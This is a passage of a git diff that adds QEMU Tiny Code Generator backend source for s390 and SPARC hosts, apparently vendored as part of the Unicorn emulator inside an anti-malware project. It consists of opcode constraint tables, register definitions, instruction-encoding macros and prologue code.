tcg_out_movi. */ + case INDEX_op_movi_i64: + case INDEX_op_call: /* Always emitted via tcg_out_call. 
*/ + default: + tcg_abort(); + } +} + +static const TCGTargetOpDef s390_op_defs[] = { + { INDEX_op_exit_tb, { } }, + { INDEX_op_goto_tb, { } }, + { INDEX_op_br, { } }, + + { INDEX_op_ld8u_i32, { "r", "r" } }, + { INDEX_op_ld8s_i32, { "r", "r" } }, + { INDEX_op_ld16u_i32, { "r", "r" } }, + { INDEX_op_ld16s_i32, { "r", "r" } }, + { INDEX_op_ld_i32, { "r", "r" } }, + { INDEX_op_st8_i32, { "r", "r" } }, + { INDEX_op_st16_i32, { "r", "r" } }, + { INDEX_op_st_i32, { "r", "r" } }, + + { INDEX_op_add_i32, { "r", "r", "ri" } }, + { INDEX_op_sub_i32, { "r", "0", "ri" } }, + { INDEX_op_mul_i32, { "r", "0", "rK" } }, + + { INDEX_op_div2_i32, { "b", "a", "0", "1", "r" } }, + { INDEX_op_divu2_i32, { "b", "a", "0", "1", "r" } }, + + { INDEX_op_and_i32, { "r", "0", "ri" } }, + { INDEX_op_or_i32, { "r", "0", "rO" } }, + { INDEX_op_xor_i32, { "r", "0", "rX" } }, + + { INDEX_op_neg_i32, { "r", "r" } }, + + { INDEX_op_shl_i32, { "r", "0", "Ri" } }, + { INDEX_op_shr_i32, { "r", "0", "Ri" } }, + { INDEX_op_sar_i32, { "r", "0", "Ri" } }, + + { INDEX_op_rotl_i32, { "r", "r", "Ri" } }, + { INDEX_op_rotr_i32, { "r", "r", "Ri" } }, + + { INDEX_op_ext8s_i32, { "r", "r" } }, + { INDEX_op_ext8u_i32, { "r", "r" } }, + { INDEX_op_ext16s_i32, { "r", "r" } }, + { INDEX_op_ext16u_i32, { "r", "r" } }, + + { INDEX_op_bswap16_i32, { "r", "r" } }, + { INDEX_op_bswap32_i32, { "r", "r" } }, + + { INDEX_op_add2_i32, { "r", "r", "0", "1", "rA", "r" } }, + { INDEX_op_sub2_i32, { "r", "r", "0", "1", "rA", "r" } }, + + { INDEX_op_brcond_i32, { "r", "rC" } }, + { INDEX_op_setcond_i32, { "r", "r", "rC" } }, + { INDEX_op_movcond_i32, { "r", "r", "rC", "r", "0" } }, + { INDEX_op_deposit_i32, { "r", "0", "r" } }, + + { INDEX_op_qemu_ld_i32, { "r", "L" } }, + { INDEX_op_qemu_ld_i64, { "r", "L" } }, + { INDEX_op_qemu_st_i32, { "L", "L" } }, + { INDEX_op_qemu_st_i64, { "L", "L" } }, + + { INDEX_op_ld8u_i64, { "r", "r" } }, + { INDEX_op_ld8s_i64, { "r", "r" } }, + { INDEX_op_ld16u_i64, { "r", "r" } }, + { 
INDEX_op_ld16s_i64, { "r", "r" } }, + { INDEX_op_ld32u_i64, { "r", "r" } }, + { INDEX_op_ld32s_i64, { "r", "r" } }, + { INDEX_op_ld_i64, { "r", "r" } }, + + { INDEX_op_st8_i64, { "r", "r" } }, + { INDEX_op_st16_i64, { "r", "r" } }, + { INDEX_op_st32_i64, { "r", "r" } }, + { INDEX_op_st_i64, { "r", "r" } }, + + { INDEX_op_add_i64, { "r", "r", "ri" } }, + { INDEX_op_sub_i64, { "r", "0", "ri" } }, + { INDEX_op_mul_i64, { "r", "0", "rK" } }, + + { INDEX_op_div2_i64, { "b", "a", "0", "1", "r" } }, + { INDEX_op_divu2_i64, { "b", "a", "0", "1", "r" } }, + { INDEX_op_mulu2_i64, { "b", "a", "0", "r" } }, + + { INDEX_op_and_i64, { "r", "0", "ri" } }, + { INDEX_op_or_i64, { "r", "0", "rO" } }, + { INDEX_op_xor_i64, { "r", "0", "rX" } }, + + { INDEX_op_neg_i64, { "r", "r" } }, + + { INDEX_op_shl_i64, { "r", "r", "Ri" } }, + { INDEX_op_shr_i64, { "r", "r", "Ri" } }, + { INDEX_op_sar_i64, { "r", "r", "Ri" } }, + + { INDEX_op_rotl_i64, { "r", "r", "Ri" } }, + { INDEX_op_rotr_i64, { "r", "r", "Ri" } }, + + { INDEX_op_ext8s_i64, { "r", "r" } }, + { INDEX_op_ext8u_i64, { "r", "r" } }, + { INDEX_op_ext16s_i64, { "r", "r" } }, + { INDEX_op_ext16u_i64, { "r", "r" } }, + { INDEX_op_ext32s_i64, { "r", "r" } }, + { INDEX_op_ext32u_i64, { "r", "r" } }, + + { INDEX_op_bswap16_i64, { "r", "r" } }, + { INDEX_op_bswap32_i64, { "r", "r" } }, + { INDEX_op_bswap64_i64, { "r", "r" } }, + + { INDEX_op_add2_i64, { "r", "r", "0", "1", "rA", "r" } }, + { INDEX_op_sub2_i64, { "r", "r", "0", "1", "rA", "r" } }, + + { INDEX_op_brcond_i64, { "r", "rC" } }, + { INDEX_op_setcond_i64, { "r", "r", "rC" } }, + { INDEX_op_movcond_i64, { "r", "r", "rC", "r", "0" } }, + { INDEX_op_deposit_i64, { "r", "0", "r" } }, + + { -1 }, +}; + +static void query_facilities(void) +{ + unsigned long hwcap = qemu_getauxval(AT_HWCAP); + + /* Is STORE FACILITY LIST EXTENDED available? Honestly, I believe this + is present on all 64-bit systems, but let's check for it anyway. 
*/ + if (hwcap & HWCAP_S390_STFLE) { + register int r0 __asm__("0"); + register void *r1 __asm__("1"); + + /* stfle 0(%r1) */ + r1 = &facilities; + asm volatile(".word 0xb2b0,0x1000" + : "=r"(r0) : "0"(0), "r"(r1) : "memory", "cc"); + } +} + +static void tcg_target_init(TCGContext *s) +{ + query_facilities(); + + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I32], 0, 0xffff); + tcg_regset_set32(s->tcg_target_available_regs[TCG_TYPE_I64], 0, 0xffff); + + tcg_regset_clear(s->tcg_target_call_clobber_regs); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R0); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R1); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R2); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R3); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R4); + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R5); + /* The r6 register is technically call-saved, but it's also a parameter + register, so it can get killed by setup for the qemu_st helper. */ + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R6); + /* The return register can be considered call-clobbered. 
*/ + tcg_regset_set_reg(s->tcg_target_call_clobber_regs, TCG_REG_R14); + + tcg_regset_clear(s->reserved_regs); + tcg_regset_set_reg(s->reserved_regs, TCG_TMP0); + /* XXX many insns can't be used with R0, so we better avoid it for now */ + tcg_regset_set_reg(s->reserved_regs, TCG_REG_R0); + tcg_regset_set_reg(s->reserved_regs, TCG_REG_CALL_STACK); + + tcg_add_target_add_op_defs(s, s390_op_defs); +} + +#define FRAME_SIZE ((int)(TCG_TARGET_CALL_STACK_OFFSET \ + + TCG_STATIC_CALL_ARGS_SIZE \ + + CPU_TEMP_BUF_NLONGS * sizeof(long))) + +static void tcg_target_qemu_prologue(TCGContext *s) +{ + /* stmg %r6,%r15,48(%r15) (save registers) */ + tcg_out_insn(s, RXY, STMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, 48); + + /* aghi %r15,-frame_size */ + tcg_out_insn(s, RI, AGHI, TCG_REG_R15, -FRAME_SIZE); + + tcg_set_frame(s, TCG_REG_CALL_STACK, + TCG_STATIC_CALL_ARGS_SIZE + TCG_TARGET_CALL_STACK_OFFSET, + CPU_TEMP_BUF_NLONGS * sizeof(long)); + + if (GUEST_BASE >= 0x80000) { + tcg_out_movi(s, TCG_TYPE_PTR, TCG_GUEST_BASE_REG, GUEST_BASE); + tcg_regset_set_reg(s->reserved_regs, TCG_GUEST_BASE_REG); + } + + tcg_out_mov(s, TCG_TYPE_PTR, TCG_AREG0, tcg_target_call_iarg_regs[0]); + /* br %r3 (go to TB) */ + tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, tcg_target_call_iarg_regs[1]); + + tb_ret_addr = s->code_ptr; + + /* lmg %r6,%r15,fs+48(%r15) (restore registers) */ + tcg_out_insn(s, RXY, LMG, TCG_REG_R6, TCG_REG_R15, TCG_REG_R15, + FRAME_SIZE + 48); + + /* br %r14 (return) */ + tcg_out_insn(s, RR, BCR, S390_CC_ALWAYS, TCG_REG_R14); +} + +#define ELF_HOST_MACHINE EM_S390 diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h new file mode 100644 index 0000000..5acc28c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/s390/tcg-target.h @@ -0,0 +1,122 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2009 Ulrich Hecht + * + * Permission is hereby granted, free of charge, to 
any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. 
+ */ +#ifndef TCG_TARGET_S390 +#define TCG_TARGET_S390 1 + +#define TCG_TARGET_INSN_UNIT_SIZE 2 + +typedef enum TCGReg { + TCG_REG_R0 = 0, + TCG_REG_R1, + TCG_REG_R2, + TCG_REG_R3, + TCG_REG_R4, + TCG_REG_R5, + TCG_REG_R6, + TCG_REG_R7, + TCG_REG_R8, + TCG_REG_R9, + TCG_REG_R10, + TCG_REG_R11, + TCG_REG_R12, + TCG_REG_R13, + TCG_REG_R14, + TCG_REG_R15 +} TCGReg; + +#define TCG_TARGET_NB_REGS 16 + +/* optional instructions */ +#define TCG_TARGET_HAS_div2_i32 1 +#define TCG_TARGET_HAS_rot_i32 1 +#define TCG_TARGET_HAS_ext8s_i32 1 +#define TCG_TARGET_HAS_ext16s_i32 1 +#define TCG_TARGET_HAS_ext8u_i32 1 +#define TCG_TARGET_HAS_ext16u_i32 1 +#define TCG_TARGET_HAS_bswap16_i32 1 +#define TCG_TARGET_HAS_bswap32_i32 1 +#define TCG_TARGET_HAS_not_i32 0 +#define TCG_TARGET_HAS_neg_i32 1 +#define TCG_TARGET_HAS_andc_i32 0 +#define TCG_TARGET_HAS_orc_i32 0 +#define TCG_TARGET_HAS_eqv_i32 0 +#define TCG_TARGET_HAS_nand_i32 0 +#define TCG_TARGET_HAS_nor_i32 0 +#define TCG_TARGET_HAS_deposit_i32 1 +#define TCG_TARGET_HAS_movcond_i32 1 +#define TCG_TARGET_HAS_add2_i32 1 +#define TCG_TARGET_HAS_sub2_i32 1 +#define TCG_TARGET_HAS_mulu2_i32 0 +#define TCG_TARGET_HAS_muls2_i32 0 +#define TCG_TARGET_HAS_muluh_i32 0 +#define TCG_TARGET_HAS_mulsh_i32 0 +#define TCG_TARGET_HAS_trunc_shr_i32 0 + +#define TCG_TARGET_HAS_div2_i64 1 +#define TCG_TARGET_HAS_rot_i64 1 +#define TCG_TARGET_HAS_ext8s_i64 1 +#define TCG_TARGET_HAS_ext16s_i64 1 +#define TCG_TARGET_HAS_ext32s_i64 1 +#define TCG_TARGET_HAS_ext8u_i64 1 +#define TCG_TARGET_HAS_ext16u_i64 1 +#define TCG_TARGET_HAS_ext32u_i64 1 +#define TCG_TARGET_HAS_bswap16_i64 1 +#define TCG_TARGET_HAS_bswap32_i64 1 +#define TCG_TARGET_HAS_bswap64_i64 1 +#define TCG_TARGET_HAS_not_i64 0 +#define TCG_TARGET_HAS_neg_i64 1 +#define TCG_TARGET_HAS_andc_i64 0 +#define TCG_TARGET_HAS_orc_i64 0 +#define TCG_TARGET_HAS_eqv_i64 0 +#define TCG_TARGET_HAS_nand_i64 0 +#define TCG_TARGET_HAS_nor_i64 0 +#define TCG_TARGET_HAS_deposit_i64 1 +#define 
TCG_TARGET_HAS_movcond_i64 1 +#define TCG_TARGET_HAS_add2_i64 1 +#define TCG_TARGET_HAS_sub2_i64 1 +#define TCG_TARGET_HAS_mulu2_i64 1 +#define TCG_TARGET_HAS_muls2_i64 0 +#define TCG_TARGET_HAS_muluh_i64 0 +#define TCG_TARGET_HAS_mulsh_i64 0 + +extern bool tcg_target_deposit_valid(int ofs, int len); +#define TCG_TARGET_deposit_i32_valid tcg_target_deposit_valid +#define TCG_TARGET_deposit_i64_valid tcg_target_deposit_valid + +/* used for function call generation */ +#define TCG_REG_CALL_STACK TCG_REG_R15 +#define TCG_TARGET_STACK_ALIGN 8 +#define TCG_TARGET_CALL_STACK_OFFSET 160 + +#define TCG_TARGET_EXTEND_ARGS 1 + +enum { + TCG_AREG0 = TCG_REG_R10, +}; + +static inline void flush_icache_range(uintptr_t start, uintptr_t stop) +{ +} + +#endif diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c new file mode 100644 index 0000000..3fcdcad --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/tcg/sparc/tcg-target.c @@ -0,0 +1,1613 @@ +/* + * Tiny Code Generator for QEMU + * + * Copyright (c) 2008 Fabrice Bellard + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the "Software"), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL + * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER + * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, + * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN + * THE SOFTWARE. + */ + +#include "tcg-be-null.h" + +#ifndef NDEBUG +static const char * const tcg_target_reg_names[TCG_TARGET_NB_REGS] = { + "%g0", + "%g1", + "%g2", + "%g3", + "%g4", + "%g5", + "%g6", + "%g7", + "%o0", + "%o1", + "%o2", + "%o3", + "%o4", + "%o5", + "%o6", + "%o7", + "%l0", + "%l1", + "%l2", + "%l3", + "%l4", + "%l5", + "%l6", + "%l7", + "%i0", + "%i1", + "%i2", + "%i3", + "%i4", + "%i5", + "%i6", + "%i7", +}; +#endif + +#ifdef __arch64__ +# define SPARC64 1 +#else +# define SPARC64 0 +#endif + +/* Note that sparcv8plus can only hold 64 bit quantities in %g and %o + registers. These are saved manually by the kernel in full 64-bit + slots. The %i and %l registers are saved by the register window + mechanism, which only allocates space for 32 bits. Given that this + window spill/fill can happen on any signal, we must consider the + high bits of the %i and %l registers garbage at all times. */ +#if SPARC64 +# define ALL_64 0xffffffffu +#else +# define ALL_64 0xffffu +#endif + +/* Define some temporary registers. T2 is used for constant generation. 
*/ +#define TCG_REG_T1 TCG_REG_G1 +#define TCG_REG_T2 TCG_REG_O7 + +#ifdef CONFIG_USE_GUEST_BASE +# define TCG_GUEST_BASE_REG TCG_REG_I5 +#else +# define TCG_GUEST_BASE_REG TCG_REG_G0 +#endif + +static const int tcg_target_reg_alloc_order[] = { + TCG_REG_L0, + TCG_REG_L1, + TCG_REG_L2, + TCG_REG_L3, + TCG_REG_L4, + TCG_REG_L5, + TCG_REG_L6, + TCG_REG_L7, + + TCG_REG_I0, + TCG_REG_I1, + TCG_REG_I2, + TCG_REG_I3, + TCG_REG_I4, + TCG_REG_I5, + + TCG_REG_G2, + TCG_REG_G3, + TCG_REG_G4, + TCG_REG_G5, + + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, +}; + +static const int tcg_target_call_iarg_regs[6] = { + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, + TCG_REG_O4, + TCG_REG_O5, +}; + +static const int tcg_target_call_oarg_regs[] = { + TCG_REG_O0, + TCG_REG_O1, + TCG_REG_O2, + TCG_REG_O3, +}; + +#define INSN_OP(x) ((x) << 30) +#define INSN_OP2(x) ((x) << 22) +#define INSN_OP3(x) ((x) << 19) +#define INSN_OPF(x) ((x) << 5) +#define INSN_RD(x) ((x) << 25) +#define INSN_RS1(x) ((x) << 14) +#define INSN_RS2(x) (x) +#define INSN_ASI(x) ((x) << 5) + +#define INSN_IMM10(x) ((1 << 13) | ((x) & 0x3ff)) +#define INSN_IMM11(x) ((1 << 13) | ((x) & 0x7ff)) +#define INSN_IMM13(x) ((1 << 13) | ((x) & 0x1fff)) +#define INSN_OFF16(x) ((((x) >> 2) & 0x3fff) | ((((x) >> 16) & 3) << 20)) +#define INSN_OFF19(x) (((x) >> 2) & 0x07ffff) +#define INSN_COND(x) ((x) << 25) + +#define COND_N 0x0 +#define COND_E 0x1 +#define COND_LE 0x2 +#define COND_L 0x3 +#define COND_LEU 0x4 +#define COND_CS 0x5 +#define COND_NEG 0x6 +#define COND_VS 0x7 +#define COND_A 0x8 +#define COND_NE 0x9 +#define COND_G 0xa +#define COND_GE 0xb +#define COND_GU 0xc +#define COND_CC 0xd +#define COND_POS 0xe +#define COND_VC 0xf +#define BA (INSN_OP(0) | INSN_COND(COND_A) | INSN_OP2(0x2)) + +#define RCOND_Z 1 +#define RCOND_LEZ 2 +#define RCOND_LZ 3 +#define RCOND_NZ 5 +#define RCOND_GZ 6 +#define RCOND_GEZ 7 + +#define MOVCC_ICC (1 << 18) +#define MOVCC_XCC (1 << 18 | 1 << 12) 
+ +#define BPCC_ICC 0 +#define BPCC_XCC (2 << 20) +#define BPCC_PT (1 << 19) +#define BPCC_PN 0 +#define BPCC_A (1 << 29) + +#define BPR_PT BPCC_PT + +#define ARITH_ADD (INSN_OP(2) | INSN_OP3(0x00)) +#define ARITH_ADDCC (INSN_OP(2) | INSN_OP3(0x10)) +#define ARITH_AND (INSN_OP(2) | INSN_OP3(0x01)) +#define ARITH_ANDN (INSN_OP(2) | INSN_OP3(0x05)) +#define ARITH_OR (INSN_OP(2) | INSN_OP3(0x02)) +#define ARITH_ORCC (INSN_OP(2) | INSN_OP3(0x12)) +#define ARITH_ORN (INSN_OP(2) | INSN_OP3(0x06)) +#define ARITH_XOR (INSN_OP(2) | INSN_OP3(0x03)) +#define ARITH_SUB (INSN_OP(2) | INSN_OP3(0x04)) +#define ARITH_SUBCC (INSN_OP(2) | INSN_OP3(0x14)) +#define ARITH_ADDC (INSN_OP(2) | INSN_OP3(0x08)) +#define ARITH_SUBC (INSN_OP(2) | INSN_OP3(0x0c)) +#define ARITH_UMUL (INSN_OP(2) | INSN_OP3(0x0a)) +#define ARITH_SMUL (INSN_OP(2) | INSN_OP3(0x0b)) +#define ARITH_UDIV (INSN_OP(2) | INSN_OP3(0x0e)) +#define ARITH_SDIV (INSN_OP(2) | INSN_OP3(0x0f)) +#define ARITH_MULX (INSN_OP(2) | INSN_OP3(0x09)) +#define ARITH_UDIVX (INSN_OP(2) | INSN_OP3(0x0d)) +#define ARITH_SDIVX (INSN_OP(2) | INSN_OP3(0x2d)) +#define ARITH_MOVCC (INSN_OP(2) | INSN_OP3(0x2c)) +#define ARITH_MOVR (INSN_OP(2) | INSN_OP3(0x2f)) + +#define ARITH_ADDXC (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x11)) +#define ARITH_UMULXHI (INSN_OP(2) | INSN_OP3(0x36) | INSN_OPF(0x16)) + +#define SHIFT_SLL (INSN_OP(2) | INSN_OP3(0x25)) +#define SHIFT_SRL (INSN_OP(2) | INSN_OP3(0x26)) +#define SHIFT_SRA (INSN_OP(2) | INSN_OP3(0x27)) + +#define SHIFT_SLLX (INSN_OP(2) | INSN_OP3(0x25) | (1 << 12)) +#define SHIFT_SRLX (INSN_OP(2) | INSN_OP3(0x26) | (1 << 12)) +#define SHIFT_SRAX (INSN_OP(2) | INSN_OP3(0x27) | (1 << 12)) + +#define RDY (INSN_OP(2) | INSN_OP3(0x28) | INSN_RS1(0)) +#define WRY (INSN_OP(2) | INSN_OP3(0x30) | INSN_RD(0)) +#define JMPL (INSN_OP(2) | INSN_OP3(0x38)) +#define RETURN (INSN_OP(2) | INSN_OP3(0x39)) +#define SAVE (INSN_OP(2) | INSN_OP3(0x3c)) +#define RESTORE (INSN_OP(2) | INSN_OP3(0x3d)) +#define SETHI (INSN_OP(0) | 
INSN_OP2(0x4)) +#define CALL INSN_OP(1) +#define LDUB (INSN_OP(3) | INSN_OP3(0x01)) +#define LDSB (INSN_OP(3) | INSN_OP3(0x09)) +#define LDUH (INSN_OP(3) | INSN_OP3(0x02)) +#define LDSH (INSN_OP(3) | INSN_OP3(0x0a)) +#define LDUW (INSN_OP(3) | INSN_OP3(0x00)) +#define LDSW (INSN_OP(3) | INSN_OP3(0x08)) +#define LDX (INSN_OP(3) | INSN_OP3(0x0b)) +#define STB (INSN_OP(3) | INSN_OP3(0x05)) +#define STH (INSN_OP(3) | INSN_OP3(0x06)) +#define STW (INSN_OP(3) | INSN_OP3(0x04)) +#define STX (INSN_OP(3) | INSN_OP3(0x0e)) +#define LDUBA (INSN_OP(3) | INSN_OP3(0x11)) +#define LDSBA (INSN_OP(3) | INSN_OP3(0x19)) +#define LDUHA (INSN_OP(3) | INSN_OP3(0x12)) +#define LDSHA (INSN_OP(3) | INSN_OP3(0x1a)) +#define LDUWA (INSN_OP(3) | INSN_OP3(0x10)) +#define LDSWA (INSN_OP(3) | INSN_OP3(0x18)) +#define LDXA (INSN_OP(3) | INSN_OP3(0x1b)) +#define STBA (INSN_OP(3) | INSN_OP3(0x15)) +#define STHA (INSN_OP(3) | INSN_OP3(0x16)) +#define STWA (INSN_OP(3) | INSN_OP3(0x14)) +#define STXA (INSN_OP(3) | INSN_OP3(0x1e)) + +#ifndef ASI_PRIMARY_LITTLE +#define ASI_PRIMARY_LITTLE 0x88 +#endif + +#define LDUH_LE (LDUHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDSH_LE (LDSHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDUW_LE (LDUWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDSW_LE (LDSWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define LDX_LE (LDXA | INSN_ASI(ASI_PRIMARY_LITTLE)) + +#define STH_LE (STHA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define STW_LE (STWA | INSN_ASI(ASI_PRIMARY_LITTLE)) +#define STX_LE (STXA | INSN_ASI(ASI_PRIMARY_LITTLE)) + +#ifndef use_vis3_instructions +bool use_vis3_instructions; +#endif + +static inline int check_fit_i64(int64_t val, unsigned int bits) +{ + return val == sextract64(val, 0, bits); +} + +static inline int check_fit_i32(int32_t val, unsigned int bits) +{ + return val == sextract32(val, 0, bits); +} + +#define check_fit_tl check_fit_i64 +#if SPARC64 +# define check_fit_ptr check_fit_i64 +#else +# define check_fit_ptr check_fit_i32 +#endif + +static void 
patch_reloc(tcg_insn_unit *code_ptr, int type, + intptr_t value, intptr_t addend) +{ + uint32_t insn; + + assert(addend == 0); + value = tcg_ptr_byte_diff((tcg_insn_unit *)value, code_ptr); + + switch (type) { + case R_SPARC_WDISP16: + if (!check_fit_ptr(value >> 2, 16)) { + tcg_abort(); + } + insn = *code_ptr; + insn &= ~INSN_OFF16(-1); + insn |= INSN_OFF16(value); + *code_ptr = insn; + break; + case R_SPARC_WDISP19: + if (!check_fit_ptr(value >> 2, 19)) { + tcg_abort(); + } + insn = *code_ptr; + insn &= ~INSN_OFF19(-1); + insn |= INSN_OFF19(value); + *code_ptr = insn; + break; + default: + tcg_abort(); + } +} + +/* parse target specific constraints */ +static int target_parse_constraint(TCGArgConstraint *ct, const char **pct_str) +{ + const char *ct_str; + + ct_str = *pct_str; + switch (ct_str[0]) { + case 'r': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + break; + case 'R': + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, ALL_64); + break; + case 'A': /* qemu_ld/st address constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, + TARGET_LONG_BITS == 64 ? 
ALL_64 : 0xffffffff); + reserve_helpers: + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O0); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O1); + tcg_regset_reset_reg(ct->u.regs, TCG_REG_O2); + break; + case 's': /* qemu_st data 32-bit constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, 0xffffffff); + goto reserve_helpers; + case 'S': /* qemu_st data 64-bit constraint */ + ct->ct |= TCG_CT_REG; + tcg_regset_set32(ct->u.regs, 0, ALL_64); + goto reserve_helpers; + case 'I': + ct->ct |= TCG_CT_CONST_S11; + break; + case 'J': + ct->ct |= TCG_CT_CONST_S13; + break; + case 'Z': + ct->ct |= TCG_CT_CONST_ZERO; + break; + default: + return -1; + } + ct_str++; + *pct_str = ct_str; + return 0; +} + +/* test if a constant matches the constraint */ +static inline int tcg_target_const_match(tcg_target_long val, TCGType type, + const TCGArgConstraint *arg_ct) +{ + int ct = arg_ct->ct; + + if (ct & TCG_CT_CONST) { + return 1; + } + + if (type == TCG_TYPE_I32) { + val = (int32_t)val; + } + + if ((ct & TCG_CT_CONST_ZERO) && val == 0) { + return 1; + } else if ((ct & TCG_CT_CONST_S11) && check_fit_tl(val, 11)) { + return 1; + } else if ((ct & TCG_CT_CONST_S13) && check_fit_tl(val, 13)) { + return 1; + } else { + return 0; + } +} + +static inline void tcg_out_arith(TCGContext *s, TCGReg rd, TCGReg rs1, + TCGReg rs2, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_RS2(rs2)); +} + +static inline void tcg_out_arithi(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t offset, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) | INSN_IMM13(offset)); +} + +static void tcg_out_arithc(TCGContext *s, TCGReg rd, TCGReg rs1, + int32_t val2, int val2const, int op) +{ + tcg_out32(s, op | INSN_RD(rd) | INSN_RS1(rs1) + | (val2const ? 
INSN_IMM13(val2) : INSN_RS2(val2))); +} + +static inline void tcg_out_mov(TCGContext *s, TCGType type, + TCGReg ret, TCGReg arg) +{ + if (ret != arg) { + tcg_out_arith(s, ret, arg, TCG_REG_G0, ARITH_OR); + } +} + +static inline void tcg_out_sethi(TCGContext *s, TCGReg ret, uint32_t arg) +{ + tcg_out32(s, SETHI | INSN_RD(ret) | ((arg & 0xfffffc00) >> 10)); +} + +static inline void tcg_out_movi_imm13(TCGContext *s, TCGReg ret, int32_t arg) +{ + tcg_out_arithi(s, ret, TCG_REG_G0, arg, ARITH_OR); +} + +static void tcg_out_movi(TCGContext *s, TCGType type, + TCGReg ret, tcg_target_long arg) +{ + tcg_target_long hi, lo = (int32_t)arg; + + /* Make sure we test 32-bit constants for imm13 properly. */ + if (type == TCG_TYPE_I32) { + arg = lo; + } + + /* A 13-bit constant sign-extended to 64-bits. */ + if (check_fit_tl(arg, 13)) { + tcg_out_movi_imm13(s, ret, arg); + return; + } + + /* A 32-bit constant, or 32-bit zero-extended to 64-bits. */ + if (type == TCG_TYPE_I32 || arg == (uint32_t)arg) { + tcg_out_sethi(s, ret, arg); + if (arg & 0x3ff) { + tcg_out_arithi(s, ret, ret, arg & 0x3ff, ARITH_OR); + } + return; + } + + /* A 32-bit constant sign-extended to 64-bits. */ + if (arg == lo) { + tcg_out_sethi(s, ret, ~arg); + tcg_out_arithi(s, ret, ret, (arg & 0x3ff) | -0x400, ARITH_XOR); + return; + } + + /* A 64-bit constant decomposed into 2 32-bit pieces. 
